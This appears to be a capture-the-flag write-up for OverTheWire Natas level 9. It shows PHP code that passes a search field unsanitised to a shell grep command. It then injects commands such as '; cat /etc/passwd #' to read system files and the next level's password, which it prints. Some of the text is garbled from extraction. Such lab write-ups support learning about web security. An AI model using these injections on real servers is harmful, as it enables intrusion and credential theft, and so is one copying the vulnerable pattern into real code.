The white box is composed of three parts:
Here is the interesting part of the server source code:
Find words containing: <input name=needle><input type=submit name=submit value=Search><
,→ br><br>
</form>
Output:
<pre>
<?
$key = "";
if(array key exists("needle", $ REQUEST)) {
$key = $ REQUEST["needle"];
}
if($key != "") {
passthru("grep −i $key dictionary.txt");
}
?>
22</pre>
We can take a look at the file dictionary.txt stored here http://natas9.natas.labs.overthewire.org/dictionary.txt.
It is just a number of words in alphabetic order.
Now what’s interesting is that we can do some injection. If we submit ; echo
we will see the output
dictionary.txt!
Using ; cat /etc/passwd #
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
[...]
natas31:x:30031:30031:natas level 31:/home/natas31:/bin/bash
natas32:x:30032:30032:natas level 32:/home/natas32:/bin/bash
natas33:x:30033:30033:natas level 33:/home/natas33:/bin/bash
natas17:x:30017:30017:natas level 17:/home/natas17:/bin/bash
Use ; cat index.php #
to see some page inception (and rediscover the password for natas9).
Remember in level 8, we had a hint:
<!−− hint: password for webuser natas8 is in /etc/natas webpass/natas8 −−>
If we try to display /etc/natas webpass/natas10, we get the password nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu
; cat /etc/natas webpass/natas10